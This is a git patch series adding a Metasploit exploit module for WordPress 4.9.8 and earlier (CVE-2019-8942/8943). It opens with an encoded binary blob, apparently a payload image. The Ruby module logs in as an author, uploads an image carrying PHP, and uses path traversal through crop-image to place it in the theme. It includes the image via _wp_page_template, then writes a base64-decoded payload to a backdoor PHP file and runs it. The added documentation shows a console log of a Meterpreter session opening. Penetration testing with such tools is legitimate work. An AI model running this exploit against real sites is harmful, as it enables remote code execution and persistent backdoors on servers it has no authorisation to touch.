z?;c4!P(?0-xmMDF{UXEC=vq+UO+j8kZrI5gAdWZ&4HqvC3KflsYRo%OIct{3p=DgW
zT#c#so{s$q5%<pkWk?2Z*yzJig?gNHVLl>8XQJ{@hV8?^g(%n*U8U$vc~F2u-sSIj
z+!V^aNe;{h%$-XO51g~!U?9u(z8sP4*jq{>#x&mi4-98@zgfI@v8L0UgA`EoWhi35
z_MFJY<DPw4#BTlq!GtdYg!#F6<@bhaAQw2f*?yNNdV3X*;)E@bYTfR7gLi*;bA(6^
zHwh9LAO_tD)+eQYZhQ+vS7~EU2bB`)fK@FExva*#Jqx3y!@~fE{jwOs39u0m%|=_`
z!x<9ZmPHd0H#(^wZv#);Gv~MB9~FpqzLcl+*j)*Q1rcb~xu2|Qm7p3R<L^cNz(e?(
z6&fo>?&UdI+6d<VxP~gCOB5GcU5)g(KkbUU4tLtrjG!ak@l(5$ft$s@CUXHhiXT09
zp38RYGa8{oBHQZ|uLeEw`hBX}FJbboMfTd^N9o-=9(8W0ly4ezz})~<P{3XMl<`C}
ztFpX>j8(0J5}!(Sl?1V_q$|d~`^u+b8aI((*SiRP&JDOSmAWzF*4s7z^y%33s1ml)
z+p^EUH;OJaFET+_J}8UGe3H;!mZk-dzbuWq&{YbJ4A%|ND&(Ne@SNjSe_i#q$CbBe
zg%3GK7aXY{;fZvTK~1?`D7cM!;JsbupCp0Mty*g;B~u-D<caS8aKa_*?iM}w%7z*s
zKtdhV7)(s1*FkvxLlFt!IHhcV+ToAyY=_!ny(qBK?AnCpNxBm@ovg(W=>zBT<y=v%
z5llh1@dJ(?1y+xuSDQ%rYUO)1tbcpvrLDxtQGxeX*Iu#{wh!R<-=TtRgS{N*M4~aG
zi(=xcV8wiwyL$_;8|=mrsTW<A9;JDx-^(ck*p{*W%GKtu$5&Q}zjh^YN?!``@*-0n
z?Y=-{(O<IM|K`Mm=&Qg=hURe|KW>|i+R@O3i}hnOP$g})?9|7wA_pDGXqOF}i54tQ
z-N|%JcBrR2fGtDdPRil)O_8MAW>Y^sW{(UzU{M9&nOGOo{C4Dp&??LNbhYwV%BBI{
zZk|$TTkhFwr&;-_BscN28Z+DK<b532!fcZ)^6-w~c%)VLn3kkeu^T%Z{53a&r22J6
zSGozB{ZKWAZZEH?@1_e7f1Xb_2wu~(>Dq$Ci%N&S$EFDTweygwsmYswR%(<=!B6b$
z+qTZ(Zwbkdo^u{6a{lo!Y)H!I2&bh--P{iD_KPsS)v&K0FB}+Z!L4TqT6;_T7kR(d
z(%KS-A?DfD?>T#QHjj_(Dq4(udr`%`uj0w3#tCt~M>VX{J{#)Za<Ch3k;o>%>>S7P
z)SC|V9FS+B!q5iIMZbk9arF>q?6jDz_;iX+cwEz+X3RSAo&68?YPr(B=}y!TL>nXZ
zFxRkbapz)1kP(x+&gv(FD~Zp8D2G3zlG2l>qT8g(dMk84Od*5u`X3OI)rSmErSalo
zGMJTORs=2HZrsF0%VZ42wopT(0vwx(jBZeEKqHDNR+s%JowcXSz&0jZK3^Oazf<SO
zz#XH;fJ(im#uNwVXZ~6Zx@n7&H!>x^%m@i4p<pNNm0Mv-f^VUAitw-Y>ORp3jYj|~
zNc((6*9bD2;n$dnq8vCi?pd`Ym(I7;r!96ZCQqC_5uz1kbkGPVKqE@swa@;iBIq!1
zNpc1~Ia;70p|a;C7XCHm<r0xitsyi!npYd;^o`v)A~8yW#dRNo3xRorHgqj^AsO~N
zH0N9?*!sV&{EodY_Ssidr?UE^I?>5LX&HO&S<!jB^QO(!$|GPOnD;VTjrq%W@C`Q2
zBjA<2l1UR?(0uq>jRBSDCd~`kV#=uN8vU`9j{np-K;v0qGdKXhS|sw~%rmMD&x9FZ
z>Gj@Ii=THemZYd_y;?wkG7U{|QoXWshhJHw*FW>dj}?HS1FOXLFqzsxU5Gb}VM~4d
z0Cd})AAr6$MrvFz%Lys^ukS1ZZ1)diI5OkyALon?&JUT0h9SNeSXpU*-L4J0@FB*1
zBZ(|G!fbfsD>Wwf#{~#X?}WeFS><ps4J_#8TA|aU=gspoP?M_+=xoPtUGCMjugkW+
zPK4%@27&7{biF^Q`euhb+h4v=Y>5|TrIvrSj`5T+rVLVQzlZaa^wUYWq@HZru($%|
zG%{EeWt=xIvK!3UevM$={~3&}3Let&;+W<WgHSgyG^?OX27ErTJ5)R!NO3u{sOW*G
z!)2*1D3#A831+^j1mneTxG!O}I~_m><^qrbtimxjHKDfy5wBxKwhWP*%hlPYgXEr3
z^TS;WZi9lU^AD+)Lqoooovx+HQfEIM6|6miSfjQm;RDmb%wqUCTq(kV6(YHDcjTnH
zyl@&exu*Ih&`-%Ts=5?#@WquVxh^tF?zXPioq<^NXJ@B>^;0!D6B-Z8eZ01Dy^&HS
za)rS}g~5UV^a9MJ*U&b44F<AVi3C%B+3r{74=;O#*a4yHV}L#P$#5hMbq9ePJnoKm
z(rb&oLfP!PHsY=mW2l9Yl(I95b43EYcbiZb&r^wGgt=N9HbB|k@)Dyf$+B4g)RZ!k
zMjAE^*rVd!gTo&_JFJUudsR<|OxtcRc9zIpli*wrFFaeB;yC_mO;>cSZZa=na?Qaj
zpK_#zILRn_q?Br}*;te9Q;pIn`e{}%oTBaD9iIJwdl&#l(JIH+bc69~V6nqrB70cn
z%-6Nblfb24fS7p02Yb3%<||9C8(kCNY6deK#48_oyM7jU;8Jf)Ti+Eocl=9B6{r7*
z9`nr7?%0JSRxLyY^YH=UGda_)11(KH`?@+FwH+<J|CsBW-6I4-JWbg9B)B&lq_4EA
zQNa-LEv9(JyV~jX*KkM1EGBu=DHD8>sv`e-4w~WSzyHsh12Q5j8Q_0~r5ZEC;Gsk3
z+zQV|_h+A#ZYd^8I;-Y}PKk`?LoY;LPgr2grxa&g09D4bnA(3j=N!kS27u9BAIuup
z>zte;`4`z#ePyOW^2HKW+2UehNM(F{Iz$<BJ(=|(>pA`)gNX=~aFe%fLIR7yk{ZxE
zqPG-sG}3>xzA3O<ze`D4T%@Tn4@#+@I}iKY7kE;MbDacaDbscfA-PQoHKZ`UW*M}{
zx6$jmgah`<y2r_f7wS%C`=@)5Cw}m=<B>kN<Apfg^ZjXI+F_R?-$sgb_Dz~)Kk4k?
zZI1am<1X`fLdK)7N}LQsHIYg>%&GUY%y_GDSmj*mWj_{^&EmLbqY8p4S29Wv!P=4g
zyNq;bZFI<_HX-<2r;b1g#J4i#(be!%2duM+!#hVGl+OuF+Y4C^#{Jic++=i#huzi+
z`j}8xG8H(n>6G1UeaNc5ViwPcZorKDVTHV6?uy?P6-?sewL>+4MV#9LtkhaPvG#W1
zL8@Em0G!h@h6kReo)bwwQ=@N2^+Wrz&s}tH(SifO43oV0^+gfzOFJR5HM_-Y{Mc2?
zD_|A=lf_PVC3T9NaCAPwWbNIl-<WdU8sO5o&iq|dPHO{1fPK&S`dh%mVCDt-K-{Q<
zc_}C`H{<>_zaZZ~Q)r_B`Q8uL<T52AKw&MSF6R~`{Qd#Zc=k6}V=og-9EH&*sQRio
zsllr!mbsy=J`?Q`^a#;)U=!T9f!7NnY-@Za&-Qk$B@XqL5QZ%D3e%l~k|wSCN7t7)
z?>AKO_zuFJ%bz|1VtV$k$Q5@MW&u3v19<*=bHvH1E$>`Aos?`-ZrSn9IWce|&VQ`n
z<(Jd@3G?A#;*OYMu}x8BWJm4yvi{3bh~ia`WWCQcRsz!)Z`(??WjlW=5x%Bz=~e?3
z7ez2tFB%CM<|Z5+Xp;iU63i7H#csV0Jmh|Zo#)nHjoG=PjSPdP?wWGhvsqZS{Pu7)
z$TCG=Y(R2cysg((h*gGfzWuMLhD_UQx^CHlK46wRl~`@aI;NkdZ2eid%ym*>y&vj1
zkLxK>vFB4bQ*~*XN}fs0I^uiya;-$gt35B?wqtkK_A;$UE#uWdAky7Z+#^uIbc=qv
zyPeKroU+iS_CU_gWwyI6&f3>M48@P(eSVtNa8Hz-lj;JT1iCBO@uc~E0Q6$^aB-2v
zXzh>f&Jx|-ga}Jdz0MMLWgaq)ETl|kZ~V^t4CeaewqnAXZw+1z{%PJR!nw$6MCpgx
z$@b=NcP^YZn_?e;i~$8TOeG|@)dJMw!Vr=>eT+EN^BZiAX1JWP`{wA8Q5PoL?go9M
zQyJ6e#~YGeYb7E>Rjq;M@YHngVK7v(0Et!2m~oxNM%M9EU50X=XOa2#RMz{adR0J7
z7^>#_B#`XD`+K-l2n>e+ljMot0}nov8tF>EM8>x#j*TPB+Gu{ihpn4ElSkTfJXL9T
zN%g!SxO(AKw@yPvpUENKXu#jD7S28*rvP9k)ENBPTgK{xDBio76pFEe&Bs?PYPo5U
zec^)*{-5>BNE;j)r7w7oW3$F!uH(Jm%0aG^dglMi<D_8IFG0xnAmqb6va#5Xr;p5f
zYrQ9KwwV~ox9W8%T67c{&)uIHE#BTGg2wp-<(HoFtma3K$AThWTrCHpo<W7gw+Yo%
z|MSlWMfdi1M_hNedj~f4A}1?{t_}|%ewV&w*f-W)gPA3}yiLRiQ2_*G;?>u-2KZjx
z`graOMSdpf2Ea|}FR_ArE?RneigIT5AO&L9DCfBrsR7mho-s2ZnONFI{?i?+=@6pi
zM$QzAW`qeg%==(qsuNTOfd1%C#v%&_M%0{(l9t`8QLUOTxQCkU=j>nTb+Kg(4y{ja
zv<k^(PuavlgH55b?6uXk55Ti5-~#1tnuCH(oAXq;K3a=uLcEZNomHju;%7I^9EQ8B
zq-Bf8OLf4bLtx7a^cl~a4V!8n{P2K4sZ8eW+ti{XjzfQm$>7My=&Z~wIjC+PEz=9{
z@4aJYo%tA824DnPwk>wxYc5#p;+os2a@*M_8$(ZjJyLR9+^V$6_6y>y;O8l8Mx+K+
z@o!R7564QtZ8=s2hLFHNC6j(`a(uIIK*I`Un2%p$win}#_qKcQrlJC)d6n=;O2<TM
z2S-B{jb|gXuKi>GCCpZVRII0-?oE4im)~Q(gH7?G-S-fU5#~d$m6poRR|0KAA@2sZ
z`sB>R)U?B><TNBMKY5ax5vZ}5qpX?K4HU+T2t&QpVQtrU&hZGATV}=XwHwe+(+<Q&
z@E#XXeD&HIuE3L1&pQ9Eehn(h2`E27k?SE(4j8|=wsX80gVXE|5iZer-t1D?1^rg;
zg4MkgC42t+S;~z-@Yu&@YN)Mmei_Nv7;IhY%M332bs9f&x<8s|IhA-eVCvzgI3v;D
isRLa0>meO06`!SfpfV%F$xqnctqmtVi`T@e`~C+VRlUCe

literal 0
HcmV?d00001

diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb
new file mode 100644
index 0000000000..7176526413
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_crop_rce.rb
@@ -0,0 +1,396 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+  super(update_info(
+    info,
+    'Name'            => 'WordPress Crop-image Shell Upload',
+    'Description'     => %q{
+        This module exploit a path traversal and a local file inclusion
+        vulnerability on WordPress versions 4.9.8 and less.
+        The crop-image function allow an user, with at least author privileges,
+        to resize an image an perform a path traversal by changing the _wp_attached_file
+        reference during the upload. The second part of the exploit will include
+        this image in the current theme by changing the _wp_page_template attribute
+        when creating a post.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          =>
+    [
+      'RIPSTECH Technology', # Discovery
+      'Wilfried Becard'    # Metasploit module
+    ],
+    'DisclosureDate'  => 'Feb 19 2019',
+    'Platform'        => 'php',
+    'Arch'            => ARCH_PHP,
+    'Targets'         => [['WordPress', {}]],
+    'DefaultTarget'   => 0
+  ))
+
+  register_options(
+    [
+    OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+    OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+    ])
+  end
+
+  def check
+  cookie = wordpress_login(username, password)
+  if cookie.nil?
+    store_valid_credential(user: username, private: password, proof: cookie)
+    return CheckCode::Safe
+  end
+
+  CheckCode::Appears
+  end
+
+  def username
+  datastore['USERNAME']
+  end
+
+  def password
+  datastore['PASSWORD']
+  end
+
+  def get_wpnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.get_hidden_inputs.first["_wpnonce"]
+    end
+  end
+
+  def get_current_theme
+    uri = normalize_uri(datastore['TARGETURI'])
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.body.scan(/\/wp-content\/themes\/(\w+)\//)[0][0]
+    end
+  end
+
+  def get_ajaxnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+      'action' => 'query-attachments',
+      'post_id' => '0',
+      'query[item]' => '43',
+      'query[orderby]' => 'date',
+      'query[order]' => 'DESC',
+      'query[posts_per_page]' => '40',
+      'query[paged]' => '1'
+          }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      res.body.scan(/"edit":"(\w+)"/)[0][0]
+    end
+  end
+
+  def upload_file(tmp_filename, img_name, wp_nonce, cookie)
+    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename)
+    file = File.open(path, "r")
+    img_data = file.read
+    img_name += '.jpg'
+    data = Rex::MIME::Message.new
+    data.add_part(img_name, nil, nil, 'form-data; name="name"')
+    data.add_part('upload-attachment', nil, nil, 'form-data; name="action"')
+    data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"')
+    data.add_part(img_data, 'image/jpeg', nil, %(form-data; name=\"async-upload\"; filename=\"#{img_name}\"))
+    post_data = data.to_s
+    print_status("Uploading payload")
+    upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
+
+      res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => upload_uri,
+        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+        'data'     => post_data,
+        'cookie'   => cookie
+      )
+      if res && res.code == 200 && res.body && res.body.length > 0
+        print_good("Image uploaded")
+        res = JSON.parse(res.body)
+        image_id = res["data"]["id"]
+        update_nonce = res["data"]["nonces"]["update"]
+        filename = res["data"]["filename"]
+        return filename, image_id, update_nonce
+      end
+  end
+
+
+  def check_library(filename, current_date, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-content', 'uploads', current_date, 'cropped-'+filename)
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      if res.body.include?("gd-jpeg")
+        false
+      end
+      true
+    end
+  end
+
+  def image_editor(img_name, ajax_nonce, image_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+      'action' => 'image-editor',
+      '_ajax_nonce' => ajax_nonce,
+      'postid' => image_id,
+      'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
+      'target' => 'all',
+      'context' => '',
+      'do' => 'save'
+          }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      filename = res.body.scan(/(#{img_name}-\S+)-/)[0][0]
+      filename += '.jpg'
+    end
+  end
+
+  def get_wpnonce2(image_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php?post='+image_id.to_s+'&action=edit')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      tmp = res.get_hidden_inputs
+      _wpnonce = tmp[1].first[1]
+    end
+  end
+
+  def change_path(_wpnonce, image_id, filename, current_date, path, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+    res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_post'  => {
+        '_wpnonce' => _wpnonce,
+      'action' => 'editpost',
+      'post_ID' => image_id,
+      'meta_input[_wp_attached_file]' => current_date+filename+path
+          }
+      )
+  end
+
+  def crop_image(image_id , ajax_nonce, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_post'  => {
+      'action' => 'crop-image',
+      '_ajax_nonce' => ajax_nonce,
+      'id' => image_id,
+      'cropDetails[x1]' => 0,
+      'cropDetails[y1]' => 0,
+      'cropDetails[width]' => 400,
+      'cropDetails[height]' => 300,
+      'cropDetails[dst_width]' => 400,
+      'cropDetails[dst_height]' => 300
+        }
+    )
+  end
+
+  def include_theme(shell_name, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
+    res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => uri,
+        'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      _wpnonce = res.body.scan(/name="_wpnonce" value="(\w+)"/)[0][0]
+      post_id = res.body.scan(/"post":{"id":(\w+),/)[0][0]
+      uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+      res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_post'  => {
+          '_wpnonce'=>_wpnonce,
+          'action' => 'editpost',
+          'post_ID' => post_id,
+          'post_title' => 'wut',
+          'post_name' => 'wut',
+          'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
+          }
+      )
+      if res && res.code == 302
+        post_id
+      end
+    end
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    print_status("Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("Authenticated with WordPress")
+    store_valid_credential(user: username, private: password, proof: cookie)
+
+    print_status("Preparing payload...")
+    img_name = Rex::Text.rand_text_alpha(10)
+    @current_theme = get_current_theme
+    wp_nonce = get_wpnonce(cookie)
+
+    print_status("Checking crop library")
+    tmp_filename = "evil.jpg"
+    @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+    ajax_nonce = get_ajaxnonce(cookie)
+    @current_date = Time.now.strftime("%Y/%m/")
+    #Check current library
+    use_imagick = true
+    crop_image(image_id, ajax_nonce, cookie)
+    use_imagick = check_library(@filename1, @current_date, cookie)
+
+    if use_imagick 
+      #IMAGICK exploit
+      img_name = Rex::Text.rand_text_alpha(10)
+      @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+      ajax_nonce = get_ajaxnonce(cookie)
+      @filename2 = image_editor(img_name, ajax_nonce, image_id, cookie)
+
+      _wpnonce =  get_wpnonce2(image_id, cookie)
+      change_path(_wpnonce, image_id, @filename2, @current_date, '?/x', cookie)
+      crop_image(image_id , ajax_nonce, cookie)
+      @shell_name = Rex::Text.rand_text_alpha(10)
+      change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+      crop_image(image_id , ajax_nonce, cookie)
+      print_status("Including into theme")
+      post_id = include_theme(@shell_name, cookie)
+      uri = normalize_uri(datastore['TARGETURI'])
+      #Test if base64 is on target
+      test_string = 'YmFzZTY0c3BvdHRlZAo='
+      res = send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_get' => {
+          'p' => "#{post_id}",
+          '0' => "echo #{test_string} | base64 -d"
+        }
+      )
+      if res && res.code == 200 && res.body && res.body.length > 0
+        if res.body.include?("base64spotted")
+          #Execute payload with base64 decode
+          @backdoor = Rex::Text.rand_text_alpha(10)
+          encoded = Rex::Text.encode_base64(payload.encoded)
+          res = send_request_cgi(
+            'method'   => 'GET',
+            'uri'      => uri,
+            'cookie' => cookie,
+            'vars_get' => {
+              'p' => "#{post_id}",
+              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+            }
+          )
+          if res && res.code == 200 && res.body && res.body.length > 0
+            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+            res = send_request_cgi(
+              'method'   => 'GET',
+              'uri'      => uri,
+              'cookie' => cookie
+              )
+          end
+        else
+          print_status("Can't find base64 decode on target.")
+        end
+      end
+    else
+      #GD stuff
+      print_status('GD library')
+      tmp_filename = "evilshell.jpg"
+      img_name = Rex::Text.rand_text_alpha(10)
+      @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+      ajax_nonce = get_ajaxnonce(cookie)
+      _wpnonce =  get_wpnonce2(image_id, cookie)
+      @shell_name = Rex::Text.rand_text_alpha(10)
+      change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+      crop_image(image_id , ajax_nonce, cookie)
+      print_status("Including into theme")
+      post_id = include_theme(@shell_name, cookie)
+      uri = normalize_uri(datastore['TARGETURI'])
+      #Test if base64 is on target
+      test_string = 'YmFzZTY0c3BvdHRlZAo='
+      res = send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_get' => {
+          'p' => "#{post_id}",
+          '0' => "echo #{test_string} | base64 -d"
+        }
+      )
+      if res && res.code == 200 && res.body && res.body.length > 0
+        if res.body.include?("base64spotted")
+          #Execute payload with base64 decode
+          @backdoor = Rex::Text.rand_text_alpha(10)
+          encoded = Rex::Text.encode_base64(payload.encoded)
+          res = send_request_cgi(
+            'method'   => 'GET',
+            'uri'      => uri,
+            'cookie' => cookie,
+            'vars_get' => {
+              'p' => "#{post_id}",
+              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+            }
+          )
+          if res && res.code == 200 && res.body && res.body.length > 0
+            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+            res = send_request_cgi(
+              'method'   => 'GET',
+              'uri'      => uri,
+              'cookie' => cookie
+              )
+          end
+        else
+          print_status("Can't find base64 decode on target.")
+        end
+      end
+    end
+  end
+
+  def on_new_session(client)
+    #sleep 1
+    client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
+    client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
+    client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename2[0...10]}*")
+    client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
+    #client.shell_command_token("rm #{@backdoor}.php")
+  end
+
+end

From b168312db168eb6105f60e2c28236ccf595b111c Mon Sep 17 00:00:00 2001
From: wilfried <wilfried@debian>
Date: Tue, 19 Mar 2019 17:51:59 +0100
Subject: [PATCH 02/16] Add exploit module for Wordpress core <=4.9.8
 (CVE-2019-8942)

---
 modules/exploits/unix/webapp/wp_crop_rce.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb
index 7176526413..12ff6ab9eb 100644
--- a/modules/exploits/unix/webapp/wp_crop_rce.rb
+++ b/modules/exploits/unix/webapp/wp_crop_rce.rb
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part(img_name, nil, nil, 'form-data; name="name"')
     data.add_part('upload-attachment', nil, nil, 'form-data; name="action"')
     data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"')
-    data.add_part(img_data, 'image/jpeg', nil, %(form-data; name=\"async-upload\"; filename=\"#{img_name}\"))
+    data.add_part(img_data, 'image/jpeg', nil, "form-data; name=\"async-upload\"; filename=\"#{img_name}\"")
     post_data = data.to_s
     print_status("Uploading payload")
     upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
@@ -124,7 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'method'   => 'POST',
         'uri'      => upload_uri,
         'ctype'    => "multipart/form-data; boundary=#{data.bound}",
-        'data'     => post_data,
+        'data'     => post_data,    #FIXME: during upload process image isn't uploaded as intended (binary has changed).
+                                    # In case of GD library the image structure is destroyed resulting into an impossibility to crop.
         'cookie'   => cookie
       )
       if res && res.code == 200 && res.body && res.body.length > 0

From 794134735e133bc7ca45ca4a8762729510e48ce5 Mon Sep 17 00:00:00 2001
From: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Date: Tue, 19 Mar 2019 20:36:13 +0100
Subject: [PATCH 03/16] Update modules/exploits/unix/webapp/wp_crop_rce.rb

Co-Authored-By: tiyeuse <39072217+tiyeuse@users.noreply.github.com>
---
 modules/exploits/unix/webapp/wp_crop_rce.rb | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb
index 12ff6ab9eb..743de28234 100644
--- a/modules/exploits/unix/webapp/wp_crop_rce.rb
+++ b/modules/exploits/unix/webapp/wp_crop_rce.rb
@@ -30,6 +30,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'RIPSTECH Technology', # Discovery
       'Wilfried Becard'    # Metasploit module
     ],
+  'References'      =>
+    [
+      [ 'CVE', '2019-8942' ],
+      [ 'CVE', '2019-8943' ],
+      [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
+    ],
     'DisclosureDate'  => 'Feb 19 2019',
     'Platform'        => 'php',
     'Arch'            => ARCH_PHP,

From 8853d6d5b5364988a3187f9e31c02821110ed4df Mon Sep 17 00:00:00 2001
From: wilfried <wilfried@debian>
Date: Fri, 22 Mar 2019 17:37:04 +0100
Subject: [PATCH 04/16] Adding documentation + cleaning files from the exploit

---
 .../modules/exploit/multi/http/wp_crop_rce.md |  58 +++
 .../webapp => multi/http}/wp_crop_rce.rb      | 336 +++++++++---------
 2 files changed, 232 insertions(+), 162 deletions(-)
 create mode 100644 documentation/modules/exploit/multi/http/wp_crop_rce.md
 rename modules/exploits/{unix/webapp => multi/http}/wp_crop_rce.rb (57%)

diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md
new file mode 100644
index 0000000000..2eec8e1a26
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md
@@ -0,0 +1,58 @@
+On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
+An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
+
+## Exploitation Steps
+
+1. Upload an image containing PHP code
+2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
+3. Perform the Path Traversal by using the `crop-image` Wordpress function
+4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
+
+When visiting the post created by the attacker it is possible to obtain code execudion.
+
+More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
+
+## Verification Steps
+
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/unix/webapp/wp_crop_rce`
+3. Set the `RHOST`
+4. Set `USERNAME` and `PASSWORD`
+4. Set `LHOST` and `LPORT`
+5. Run the exploit: `run`
+6. Confirm you have now a meterpreter session
+
+
+## Scenarios
+
+### Ubuntu 18.04 running WordPress 4.9.8
+
+```
+msf5 > use exploit/unix/webapp/wp_crop_rce
+msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_crop_rce) > set username author
+username => author
+msf5 exploit(unix/webapp/wp_crop_rce) > set password author
+password => author
+msf5 exploit(unix/webapp/wp_crop_rce) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Authenticating with WordPress using author:author...
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Checking crop library
+[*] Uploading payload
+[+] Image uploaded
+[*] Uploading payload
+[+] Image uploaded
+[*] Including into theme
+[*] Sending stage (38247 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
+Meterpreter : php/linux
+```
diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
similarity index 57%
rename from modules/exploits/unix/webapp/wp_crop_rce.rb
rename to modules/exploits/multi/http/wp_crop_rce.rb
index 743de28234..6405942862 100644
--- a/modules/exploits/unix/webapp/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
     'License'         => MSF_LICENSE,
     'Author'          =>
     [
-      'RIPSTECH Technology', # Discovery
-      'Wilfried Becard'    # Metasploit module
+      'RIPSTECH Technology',                               # Discovery
+      'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
     ],
